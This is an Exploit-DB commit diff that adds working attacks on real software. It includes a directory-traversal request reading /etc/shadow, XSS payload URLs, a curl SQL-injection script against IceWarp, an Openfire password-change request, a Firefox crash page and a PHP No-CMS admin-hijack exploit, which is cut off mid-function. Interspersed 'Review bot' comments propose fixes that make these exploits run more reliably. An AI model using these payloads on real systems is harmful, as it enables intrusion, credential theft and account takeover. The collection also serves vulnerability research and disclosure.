Updated 04_23_2014

This commit is contained in:
Offensive Security 2014-04-23 04:35:22 +00:00
parent ef56e24142
commit 038ba787cc
24 changed files with 847 additions and 2 deletions


@ -29612,7 +29612,7 @@ id,file,description,date,author,platform,type,port
32856,platforms/linux/dos/32856.txt,"MPlayer Malformed AAC File Handling DoS",2008-10-07,"Hanno Bock",linux,dos,0
32857,platforms/linux/dos/32857.txt,"MPlayer Malformed OGM File Handling DoS",2008-10-07,"Hanno Bock",linux,dos,0
32858,platforms/java/webapps/32858.txt,"Sun Java System Messenger Express 6.3-0.15 'error' Parameter Cross-Site Scripting Vulnerability",2009-03-17,syniack,java,webapps,0
32859,platforms/hardware/webapps/32859.txt,"Sagem Fast 3304-V2 - Authentification Bypass",2014-04-14,"Yassin Aboukir",hardware,webapps,0
32859,platforms/hardware/webapps/32859.txt,"Sagem Fast 3304-V2 - Authentication Bypass",2014-04-14,"Yassin Aboukir",hardware,webapps,0
32860,platforms/java/dos/32860.txt,"Sun Java System Calendar Server 6.3 Duplicate URI Request Denial of Service Vulnerability",2009-03-31,"SCS team",java,dos,0
32861,platforms/php/webapps/32861.txt,"WordPress Theme LineNity 1.20 - Local File Inclusion",2014-04-14,"felipe andrian",php,webapps,0
32862,platforms/java/webapps/32862.txt,"Sun Java System Calendar Server 6 'command.shtml' Cross Site Scripting Vulnerability",2009-03-31,"SCS team",java,webapps,0
@ -29693,6 +29693,7 @@ id,file,description,date,author,platform,type,port
32942,platforms/linux/remote/32942.txt,"Mozilla Multiple Products Server Refresh Header XSS",2009-04-22,"Olli Pettay",linux,remote,0
32943,platforms/hardware/webapps/32943.txt,"Teracom Modem T2-B-Gawv1.4U10Y-BI - CSRF Vulnerability",2014-04-20,"Rakesh S",hardware,webapps,0
32944,platforms/multiple/remote/32944.txt,"SAP cFolders Cross Site Scripting And HTML Injection Vulnerabilities",2009-04-21,"Digital Security Research Group",multiple,remote,0
32945,platforms/multiple/remote/32945.txt,"010 Editor 3.0.4 File Parsing Multiple Buffer Overflow Vulnerabilities",2009-04-21,"Le Duc Anh",multiple,remote,0
32946,platforms/freebsd/local/32946.c,"FreeBSD <= 7.1 libc Berkley DB Interface Uninitialized Memory Local Information Disclosure Vulnerability",2009-01-15,"Jaakko Heinonen",freebsd,local,0
32947,platforms/linux/local/32947.txt,"DirectAdmin <= 1.33.3 '/CMD_DB' Backup Action Insecure Temporary File Creation Vulnerability",2009-04-22,anonymous,linux,local,0
32948,platforms/php/webapps/32948.txt,"New5starRating 1.0 'admin/control_panel_sample.php' SQL Injection Vulnerability",2009-04-22,zer0day,php,webapps,0
@ -29706,3 +29707,24 @@ id,file,description,date,author,platform,type,port
32956,platforms/windows/dos/32956.py,"RealNetworks RealPlayer Gold 10.0 MP3 File Handling Remote Denial of Service Vulnerability",2009-04-27,"Abdul-Aziz Hariri",windows,dos,0
32957,platforms/windows/remote/32957.txt,"DWebPro 6.8.26 Directory Traversal Vulnerability and Arbitrary File Disclosure Vulnerability",2009-04-27,"Alfons Luja",windows,remote,0
32958,platforms/php/webapps/32958.txt,"MataChat 'input.php' Multiple Cross Site Scripting Vulnerabilities",2009-04-27,Am!r,php,webapps,0
32959,platforms/windows/remote/32959.rb,"Adobe Flash Player Regular Expression Heap Overflow",2014-04-21,metasploit,windows,remote,0
32960,platforms/php/webapps/32960.txt,"Invision Power Board 3.0 Multiple HTML-Injection and Information Disclosure Vulnerabilities",2009-04-27,brain[pillow],php,webapps,0
32961,platforms/linux/dos/32961.html,"Mozilla Firefox 3.0.9 'nsTextFrame::ClearTextRun()' Remote Memory Corruption Vulnerability",2009-04-27,"Marc Gueury",linux,dos,0
32962,platforms/cgi/remote/32962.txt,"LevelOne AMG-2000 2.00.00 Security Bypass Vulnerability",2009-04-29,J.Greil,cgi,remote,0
32963,platforms/php/webapps/32963.txt,"Coppermine Photo Gallery <= 1.4.21 'css' Parameter Cross-Site Scripting Vulnerability",2009-04-29,"Gerendi Sandor Attila",php,webapps,0
32964,platforms/linux/dos/32964.c,"GnuTLS 2.6.x libgnutls lib/pk-libgcrypt.c Malformed DSA Key Handling Remote DoS",2009-04-30,"Miroslav Kratochvil",linux,dos,0
32965,platforms/linux/remote/32965.c,"GnuTLS 2.6.x libgnutls lib/gnutls_pk.c DSA Key Storage Remote Spoofing",2009-04-30,"Miroslav Kratochvil",linux,remote,0
32966,platforms/php/webapps/32966.txt,"MyBB 1.4.5 Multiple Security Vulnerabilities",2009-05-03,"Jacques Copeau",php,webapps,0
32967,platforms/multiple/remote/32967.txt,"Openfire 3.x jabber:iq:auth 'passwd_change' Remote Password Change Vulnerability",2009-05-04,"Daryl Herzmann",multiple,remote,0
32968,platforms/php/webapps/32968.sh,"IceWarp Merak Mail Server 9.4.1 Groupware Component Multiple SQL Injection Vulnerabilities",2009-05-05,"RedTeam Pentesting",php,webapps,0
32969,platforms/php/webapps/32969.txt,"IceWarp Merak Mail Server 9.4.1 'cleanHTML()' Function Cross-Site Scripting Vulnerability",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0
32971,platforms/multiple/remote/32971.txt,"Glassfish Enterprise Server 2.1 Admin Console /applications/applications.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
32973,platforms/hardware/webapps/32973.txt,"Sixnet Sixview 2.4.1 - Web Console Directory Traversal",2014-04-22,"daniel svartman",hardware,webapps,0
32974,platforms/multiple/remote/32974.txt,"Glassfish Enterprise Server 2.1 Admin Console /configuration/configuration.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
32975,platforms/multiple/remote/32975.txt,"Glassfish Enterprise Server 2.1 Admin Console /customMBeans/customMBeans.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
32976,platforms/php/webapps/32976.php,"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / RCE Exploit via Static Encryption Key",2014-04-22,"Mehmet Dursun Ince",php,webapps,0
32977,platforms/multiple/remote/32977.txt,"Glassfish Enterprise Server 2.1 Admin Console /resourceNode/resources.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
32978,platforms/multiple/remote/32978.txt,"Glassfish Enterprise Server 2.1 Admin Console /sysnet/registration.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
32979,platforms/multiple/remote/32979.txt,"Glassfish Enterprise Server 2.1 Admin Console /webService/webServicesGeneral.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0
32980,platforms/multiple/remote/32980.txt,"Glassfish Enterprise Server 2.1 Admin Console /configuration/auditModuleEdit.jsf name Parameter XSS",2009-05-05,DSecRG,multiple,remote,0
32981,platforms/multiple/remote/32981.txt,"Glassfish Enterprise Server 2.1 Admin Console /resourceNode/jdbcResourceEdit.jsf name Parameter XSS",2009-05-05,DSecRG,multiple,remote,0


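--- a/platforms/cgi/remote/32962.txt
+++ b/platforms/cgi/remote/32962.txt
@@ -0,0 +1,36 @@
+source: http://www.securityfocus.com/bid/34760/info
+LevelOne AMG-2000 is prone to a security-bypass vulnerability.
+Attackers may exploit this issue to gain access to the administrative interface and internal computers from an outside network. This may aid in further attacks.
+Note that valid authentication credentials must still be provided to authenticate to the device's administrative interface. Attackers may use default accounts such as 'operator' or 'manager' if the default passwords have not been changed.
+LevelOne AMG-2000 running firmware 2.00.00build00600 and prior versions are affected.
+The following examples are available:
+HTTP request to access the administration interface login page from the WLAN
+GET http://127.0.0.1/ HTTP/1.1
+Host: 192.168.0.1:2128
+[...]
+HTTP request to login to the admin interface with the user "manager"
+POST http://127.0.0.1/check.shtml HTTP/1.1
+Host: 192.168.0.1:2128
+[...]
+username=manager&password=manager&Submit=ENTER
+HTTP request to access other internal IP addresses configured on the private LAN port
+GET http://10.0.0.1/ HTTP/1.1
+Host: 192.168.0.1:2128
+[...]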


@ -1,4 +1,4 @@
# Title : Sagem F@st 3304-V2 Authentification Bypass
# Title : Sagem F@st 3304-V2 Authentication Bypass
# Vendor : http://www.sagemcom.com
# Severity : High
# Tested on : Firefox, Google Chrome, Internet Explorer


@ -0,0 +1,42 @@
#Exploit Title: Sixnet sixview web console directory traversal
#Date: 2014-04-21
#Exploit Author: daniel svartman
#Vendor Homepage: www.sixnet.com
#Software Link: Not available, hardware piece - appliance
#Version: 2.4.1
#Tested on: Sixnet Sixview web console (Linux based appliance)
#CVE : 2014-2976
PoV, Sixnet sixview web console handle requests through HTTP on port 18081.
These requests can be received either through GET or POST requests.
I discovered that GET requests are not validated at the server side,
allowing an attacker to request arbitrary files from the supporting OS.
Below is an example of the affected URL and the received answer using
netcat:
ncat <HOSTNAME> 18081
GET /../../../../../../../../../../etc/shadow HTTP/1.1
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Type: text/html
Keep-Alive: timeout=15, max=50
Date: <SNIP>
Last-Modified: <SNIP>
Content-Length: 1025
root:<REMOVED>:15655:0:99999:7:::
bin:*:15513:0:99999:7:::
daemon:*:15513:0:99999:7:::
adm:*:15513:0:99999:7:::
lp:*:15513:0:99999:7:::
sync:*:15513:0:99999:7:::
shutdown:*:15513:0:99999:7:::
halt:*:15513:0:99999:7:::
mail:*:15513:0:99999:7:::
uucp:*:15513:0:99999:7:::
<SNIP>
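Review bot: The identifier on the `#CVE :` line is written as `2014-2976`, without the `CVE-` prefix that the 32964.c and 32965.c comments in this same commit use (`CVE-2009-1415`, `CVE-2009-1416`); `#CVE : CVE-2014-2976` would make the header greppable alongside them. `PoV,` at the start of the description reads as a typo for `PoC`. The write-up also names no fixed version or vendor advisory, so a reader cannot tell whether 2.4.1 is the last affected build; a header line such as `#Fix: <vendor advisory URL or fixed version>` (placeholder) would close that gap.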

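--- a/platforms/linux/dos/32961.html
+++ b/platforms/linux/dos/32961.html
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/34743/info
+Mozilla Firefox is prone to a remote memory-corruption vulnerability.
+Successful exploits will allow remote attackers to execute arbitrary code within the context of the affected browser or crash the browser, denying service to legitimate users.
+<html><head><title> Bug 489647 - New 1.9.0.9 topcrash [@nsTextFrame::ClearTextRun()]</title></head> <body> <div id="a" style="white-space: pre;"> m</div> <script> function doe() { document.getElementById('a').childNodes[0].splitText(1); } setTimeout(doe, 100); </script> </body> </html>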

platforms/linux/dos/32964.c Executable file

@ -0,0 +1,92 @@
source: http://www.securityfocus.com/bid/34783/info
GnuTLS is prone to multiple remote vulnerabilities:
- A remote code-execution vulnerability
- A denial-of-service vulnerability
- A signature-generation vulnerability
- A signature-verification vulnerability
An attacker can exploit these issues to potentially execute arbitrary code, trigger denial-of-service conditions, carry out attacks against data signed with weak signatures, and cause clients to accept expired or invalid certificates from servers.
Versions prior to GnuTLS 2.6.6 are vulnerable.
/*
* Small code to reproduce the CVE-2009-1415 double-free problem.
*
* Build it using:
*
* gcc -o cve-2009-1415 cve-2009-1415.c -lgnutls
*
* If your gnutls library is OK then running it will just print 'success!'.
*
* If your gnutls library is buggy, then running it will crash like this:
*
* ** glibc detected *** ./cve-2009-1415: munmap_chunk(): invalid pointer: 0xb7f80a9c ***
* ======= Backtrace: =========
* ...
*/
#include <stdio.h>
#include <stdarg.h>
#include <stdlib.h>
#include <gnutls/gnutls.h>
static char dsa_cert[] =
"-----BEGIN CERTIFICATE-----\n"
"MIIDbzCCAtqgAwIBAgIERiYdRTALBgkqhkiG9w0BAQUwGTEXMBUGA1UEAxMOR251\n"
"VExTIHRlc3QgQ0EwHhcNMDcwNDE4MTMyOTQxWhcNMDgwNDE3MTMyOTQxWjA3MRsw\n"
"GQYDVQQKExJHbnVUTFMgdGVzdCBzZXJ2ZXIxGDAWBgNVBAMTD3Rlc3QuZ251dGxz\n"
"Lm9yZzCCAbQwggEpBgcqhkjOOAQBMIIBHAKBgLmE9VqBvhoNxYpzjwybL5u2DkvD\n"
"dBp/ZK2d8yjFoEe8m1dW8ZfVfjcD6fJM9OOLfzCjXS+7oaI3wuo1jx+xX6aiXwHx\n"
"IzYr5E8vLd2d1TqmOa96UXzSJY6XdM8exXtLdkOBBx8GFLhuWBLhkOI3b9Ib7GjF\n"
"WOLmMOBqXixjeOwHAhSfVoxIZC/+jap6bZbbBF0W7wilcQKBgGIGfuRcdgi3Rhpd\n"
"15fUKiH7HzHJ0vT6Odgn0Zv8J12nCqca/FPBL0PCN8iFfz1Mq12BMvsdXh5UERYg\n"
"xoBa2YybQ/Dda6D0w/KKnDnSHHsP7/ook4/SoSLr3OCKi60oDs/vCYXpNr2LelDV\n"
"e/clDWxgEcTvcJDP1hvru47GPjqXA4GEAAKBgA+Kh1fy0cLcrN9Liw+Luin34QPk\n"
"VfqymAfW/RKxgLz1urRQ1H+gDkPnn8l4EV/l5Awsa2qkNdy9VOVgNpox0YpZbmsc\n"
"ur0uuut8h+/ayN2h66SD5out+vqOW9c3yDI+lsI+9EPafZECD7e8+O+P90EAXpbf\n"
"DwiW3Oqy6QaCr9Ivo4GTMIGQMAwGA1UdEwEB/wQCMAAwGgYDVR0RBBMwEYIPdGVz\n"
"dC5nbnV0bHMub3JnMBMGA1UdJQQMMAoGCCsGAQUFBwMBMA8GA1UdDwEB/wQFAwMH\n"
"gAAwHQYDVR0OBBYEFL/su87Y6HtwVuzz0SuS1tSZClvzMB8GA1UdIwQYMBaAFOk8\n"
"HPutkm7mBqRWLKLhwFMnyPKVMAsGCSqGSIb3DQEBBQOBgQBCsrnfD1xzh8/Eih1f\n"
"x+M0lPoX1Re5L2ElHI6DJpHYOBPwf9glwxnet2+avzgUQDUFwUSxOhodpyeaACXD\n"
"o0gGVpcH8sOBTQ+aTdM37hGkPxoXjtIkR/LgG5nP2H2JRd5TkW8l13JdM4MJFB4W\n"
"QcDzQ8REwidsfh9uKAluk1c/KQ==\n"
"-----END CERTIFICATE-----\n";
const gnutls_datum_t dsa_cert_dat = {
dsa_cert, sizeof (dsa_cert)
};
int
main (void)
{
gnutls_x509_crt_t crt;
gnutls_datum_t data = { "foo", 3 };
gnutls_datum_t sig = { "bar", 3 };
int ret;
gnutls_global_init ();
ret = gnutls_x509_crt_init (&crt);
if (ret < 0)
return 1;
ret = gnutls_x509_crt_import (crt, &dsa_cert_dat, GNUTLS_X509_FMT_PEM);
if (ret < 0)
return 1;
ret = gnutls_x509_crt_verify_data (crt, 0, &data, &sig);
if (ret < 0)
return 1;
printf ("success!\n");
gnutls_x509_crt_deinit (crt);
gnutls_global_deinit ();
return 0;
}
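Review bot: The eight advisory lines placed ahead of the `/*` block comment (`source: …` through `Versions prior to GnuTLS 2.6.6 are vulnerable.`) are outside any comment, so the file as committed does not compile with the `gcc -o cve-2009-1415 cve-2009-1415.c -lgnutls` line it documents until they are stripped or moved inside that comment; the same applies to platforms/linux/remote/32965.c. Inside `main`, the three `if (ret < 0) return 1;` exits skip `gnutls_x509_crt_deinit` and `gnutls_global_deinit` and never say which call failed, so a negative result is indistinguishable from a build problem; `fprintf (stderr, "%s\n", gnutls_strerror (ret));` before each return would make the reproducer self-diagnosing. `dsa_cert_dat.size` is `sizeof (dsa_cert)`, which counts the terminating NUL; the PEM importer presumably tolerates it here, but `sizeof (dsa_cert) - 1` is the exact length. `#include <stdarg.h>` is unused.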

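--- a/platforms/linux/remote/32965.c
+++ b/platforms/linux/remote/32965.c
@@ -0,0 +1,73 @@
+source: http://www.securityfocus.com/bid/34783/info
+GnuTLS is prone to multiple remote vulnerabilities:
+- A remote code-execution vulnerability
+- A denial-of-service vulnerability
+- A signature-generation vulnerability
+- A signature-verification vulnerability
+An attacker can exploit these issues to potentially execute arbitrary code, trigger denial-of-service conditions, carry out attacks against data signed with weak signatures, and cause clients to accept expired or invalid certificates from servers.
+Versions prior to GnuTLS 2.6.6 are vulnerable.
+/*
+* Small code to reproduce the CVE-2009-1416 bad DSA key problem.
+*
+* Build it using:
+*
+* gcc -o cve-2009-1416 cve-2009-1416.c -lgnutls
+*
+* If your gnutls library is OK then running it will print 'success!'.
+*
+* If your gnutls library is buggy then running it will print 'buggy'.
+*
+*/
+#include <stdio.h>
+#include <stdarg.h>
+#include <stdlib.h>
+#include <gcrypt.h>
+#include <gnutls/gnutls.h>
+int
+main (void)
+{
+gnutls_x509_privkey_t key;
+gnutls_datum_t p, q, g, y, x;
+int ret;
+gnutls_global_init ();
+gcry_control (GCRYCTL_ENABLE_QUICK_RANDOM, 0);
+ret = gnutls_x509_privkey_init (&key);
+if (ret < 0)
+return 1;
+ret = gnutls_x509_privkey_generate (key, GNUTLS_PK_DSA, 512, 0);
+if (ret < 0)
+return 1;
+ret = gnutls_x509_privkey_export_dsa_raw (key, &p, &q, &g, &y, &x);
+if (ret < 0)
+return 1;
+if (q.size == 3 && memcmp (q.data, "\x01\x00\x01", 3) == 0)
+printf ("buggy\n");
+else
+printf ("success!\n");
+gnutls_free (p.data);
+gnutls_free (q.data);
+gnutls_free (g.data);
+gnutls_free (y.data);
+gnutls_free (x.data);
+gnutls_x509_privkey_deinit (key);
+gnutls_global_deinit ();
+return 0;
+}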
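Review bot: `memcmp` in the `q.size == 3` check is called without `#include <string.h>`; the includes are stdio, stdarg, stdlib, gcrypt and gnutls, so the call relies on an implicit declaration, which strict C99 builds reject. Add `#include <string.h>` to the include list. The early `return 1` paths after `gnutls_x509_privkey_init`, `gnutls_x509_privkey_generate` and `gnutls_x509_privkey_export_dsa_raw` also leave `key` undeinitialised and skip `gnutls_global_deinit`, and they do not report which step failed; printing `gnutls_strerror (ret)` before each return would make a non-zero exit interpretable.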


@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/34662/info
010 Editor is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input.
Successfully exploiting these issues may allow remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts will cause denial-of-service conditions.
UPDATE (April 22, 2009): Since script files and templates may include script code used to automate editor functions, the privilege gained by a successful exploit is disputed. Please see the references for more information. We will update this BID as more information emerges.
Versions prior to 010 Editor 3.0.5 are vulnerable.
http://www.exploit-db.com/sploits/32945.zip


@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/34804/info
Openfire is prone to a vulnerability that can permit an attacker to change the password of arbitrary users.
Exploiting this issue can allow the attacker to gain unauthorized access to the affected application and to completely compromise victims' accounts.
Versions prior to Openfire 3.6.4 are vulnerable.
<iq type='set' id='passwd_change'>
<query xmlns='jabber:iq:auth'>
<username>test2</username>
<password>newillegalychangedpassword</password>
</query>
</iq>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34824/info
GlassFish Enterprise Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
GlassFish Enterprise Server 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/applications/applications.jsf?&#039;);};alert("DSecRG_XSS");</script><!--
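Review bot: The `&#039;` sequences in the URI on the last line are HTML entities for `'`, almost certainly carried over from the rendered securityfocus page rather than part of the recorded request, so the entry as stored does not show the literal characters the advisory described. Decode them to `'` before committing, or add a line stating that the entities are to be read literally. The same artefact appears in the 32974, 32975, 32977, 32978, 32979, 32980 and 32981 entries in this commit.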


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34824/info
GlassFish Enterprise Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
GlassFish Enterprise Server 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/configuration/configuration.jsf?&#039;);};alert("DSecRG_XSS");</script><!--


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34824/info
GlassFish Enterprise Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
GlassFish Enterprise Server 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/customMBeans/customMBeans.jsf?&#039;);};alert("DSecRG_XSS");</script><!--


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34824/info
GlassFish Enterprise Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
GlassFish Enterprise Server 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/resourceNode/resources.jsf?&#039;);};alert("DSecRG_XSS");</script><!--


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34824/info
GlassFish Enterprise Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
GlassFish Enterprise Server 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/sysnet/registration.jsf?&#039;);};alert("DSecRG_XSS");</script><!--


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34824/info
GlassFish Enterprise Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
GlassFish Enterprise Server 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/webService/webServicesGeneral.jsf?&#039;);};alert("DSecRG_XSS");</script><!--


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34824/info
GlassFish Enterprise Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
GlassFish Enterprise Server 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/configuration/auditModuleEdit.jsf?name=<IMG SRC=javascript:alert(&#039;DSecRG_XSS&#039;)>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34824/info
GlassFish Enterprise Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials.
GlassFish Enterprise Server 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/resourceNode/jdbcResourceEdit.jsf?name=<IMG SRC=javascript:alert(&#039;DSecRG_XSS&#039;)>

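--- a/platforms/php/webapps/32960.txt
+++ b/platforms/php/webapps/32960.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/34725/info
+Invision Power Board is prone to an information-disclosure issue and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
+An attacker may leverage these issues to determine path information or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; this may aid in other attacks.
+Invision Power Board 3.0.0b5 is vulnerable; other versions may also be affected.
+The following example data and URI are available:
+[email]qwe@[twitter]dodo style=`top:expr/* */ession/*bypassed*/(alert(/yahoo/))`do[/twitter]example.com[/email]
+http://www.example.com/index.php?app=core&module=ajax&section=register&do=check-display-name&name[]=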


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34782/info
Coppermine Photo Gallery is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to Coppermine Photo Gallery 1.4.22 are vulnerable.
http://www.example.com/docs/showdoc.php?css=1>"><ScRiPt%20%0a%0d>alert(123)%3B</ScRiPt>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34798/info
MyBB is prone to multiple security vulnerabilities, including an HTML-injection issue and an unspecified issue.
An attacker may leverage the HTML-injection issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, and to launch other attacks.
MyBB 1.4.5 is vulnerable; other versions may also be affected.
http://www.example.com/somefile.png?"><script>alert('xss')</script>

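--- a/platforms/php/webapps/32968.sh
+++ b/platforms/php/webapps/32968.sh
@@ -0,0 +1,35 @@
+source: http://www.securityfocus.com/bid/34820/info
+IceWarp Merak Mail Server is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+IceWarp Merak Mail Server 9.4.1 is affected; other versions may be vulnerable as well.
+#!/bin/sh
+sid=$1
+uid=$2
+orderby=$3
+if [ -n "$4" ] ; then
+sql=$4
+else
+sql="1=0)/*"
+fi
+curl --silent -d '<iq sid="'$sid'" type="get" format="json">
+<query xmlns="webmail:iq:items">
+<account uid="'$uid'">
+<folder uid="Files">
+<item><values><evntitle></evntitle></values>
+<filter><offset></offset><limit></limit>
+<order_by>'"$orderby"'</order_by>
+<sql>'"$sql"'</sql>
+</filter>
+</item>
+</folder>
+</account>
+</query>
+</iq>' https://example.com/webmail/server/webmail.php | \
+perl -pe 's/{/\n/g' | grep "result::" | \
+sed -e 's/^"VALUE":"result:://' -e 's/"}]}],"ATTRIBUTES":$//'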
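Review bot: The `'$sid'` and `'$uid'` splices inside the curl `-d` argument are unquoted expansions, so a value containing whitespace or glob characters is word-split and the request body silently becomes several arguments; `'"$sid"'` and `'"$uid"'`, the form already used for `$orderby` and `$sql` a few lines lower, avoid that. The four advisory lines above `#!/bin/sh` mean the shebang is not on line 1, so the file only runs when invoked explicitly through `sh`; the advisory text should be commented or moved below the shebang. There is no usage line, so a missing positional argument just emits an empty attribute — a header comment `# usage: $0 <sid> <uid> <order_by> [sql]` and `[ $# -ge 3 ] || exit 1` would state the contract. `example.com` in the curl target is a placeholder and should be marked as such.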


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/34823/info
IceWarp Merak Mail Server is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal potentially sensitive information and launch other attacks.
<img src=&#x26;&#x23;&#x78;&#x36;&#x61;&#x3b;&#x26;&#x23;&#x78;&#x36; &#x31;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x36;&#x3b;&#x26;&#x23;&#x78; &#x36;&#x31;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x33;&#x3b;&#x26;&#x23; &#x78;&#x36;&#x33;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x32;&#x3b;&#x26; &#x23;&#x78;&#x36;&#x39;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x30;&#x3b; &#x26;&#x23;&#x78;&#x37;&#x34;&#x3b;&#x26;&#x23;&#x78;&#x33;&#x61; &#x3b;&#x26;&#x23;&#x78;&#x36;&#x31;&#x3b;&#x26;&#x23;&#x78;&#x36; &#x63;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x35;&#x3b;&#x26;&#x23;&#x78; &#x37;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x34;&#x3b;&#x26;&#x23; &#x78;&#x32;&#x38;&#x3b;&#x26;&#x23;&#x78;&#x33;&#x34;&#x3b;&#x26; &#x23;&#x78;&#x33;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x39;&#x3b;>

platforms/php/webapps/32976.php Executable file

@ -0,0 +1,282 @@
<?php
/*
*
* Static encryption_key of No-CMS lead to Session Array Injection in order to
* hijack administrator account then you will be able for upload php files to
* server via theme/module upload.
*
* This exploit generates cookie for administrator access from non-privileges cookie.
*
* Full analysis can be found following link.
* http://www.mehmetince.net/codeigniter-based-no-cms-admin-account-hijacking-rce-via-static-encryption-key/
*
* TIMELINE
*
* Apr 21, 2014 at 20:17 PM = Vulnerability found.
* Apr 22, 2014 at 1:27 AM = First contact with no-cms developers.
* Apr 22, 2014 at 1:31 AM = Response from no-cms developer.
* Apr 22, 2014 at 2:29AM = Vulnerability confirmed by developers.
* Apr 22, 2014 at 04:37 = Vulnerability has been patch via following commit.
* https://github.com/goFrendiAsgard/No-CMS/commit/39d6ed327330e94b7a76a04042665dd13f2162bd
*/
define('KEY', 'namidanoregret');
define('KEYWORD', 'session_id');
function log_message($type = 'debug', $str){
echo PHP_EOL."[".$type."] ".$str;
}
function show_error($str){
echo PHP_EOL."[error] ".$str.PHP_EOL;
exit(0);
}
function _print($str){
log_message("info", $str.PHP_EOL);
}
class CI_Encrypt {
public $encryption_key = '';
protected $_hash_type = 'sha1';
protected $_mcrypt_exists = FALSE;
protected $_mcrypt_cipher;
protected $_mcrypt_mode;
public function __construct()
{
$this->_mcrypt_exists = function_exists('mcrypt_encrypt');
log_message('debug', 'Encrypt Class Initialized');
}
public function get_key($key = '')
{
return md5($this->encryption_key);
}
public function set_key($key = '')
{
$this->encryption_key = $key;
return $this;
}
public function encode_from_legacy($string, $legacy_mode = MCRYPT_MODE_ECB, $key = '')
{
if ($this->_mcrypt_exists === FALSE)
{
log_message('error', 'Encoding from legacy is available only when Mcrypt is in use.');
return FALSE;
}
elseif (preg_match('/[^a-zA-Z0-9\/\+=]/', $string))
{
return FALSE;
}
$current_mode = $this->_get_mode();
$this->set_mode($legacy_mode);
$key = $this->get_key($key);
$dec = base64_decode($string);
if (($dec = $this->mcrypt_decode($dec, $key)) === FALSE)
{
$this->set_mode($current_mode);
return FALSE;
}
$dec = $this->_xor_decode($dec, $key);
$this->set_mode($current_mode);
return base64_encode($this->mcrypt_encode($dec, $key));
}
public function _xor_encode($string, $key = '')
{
if($key === '')
$key = $this->get_key();
$rand = '';
do
{
$rand .= mt_rand();
}
while (strlen($rand) < 32);
$rand = $this->hash($rand);
$enc = '';
for ($i = 0, $ls = strlen($string), $lr = strlen($rand); $i < $ls; $i++)
{
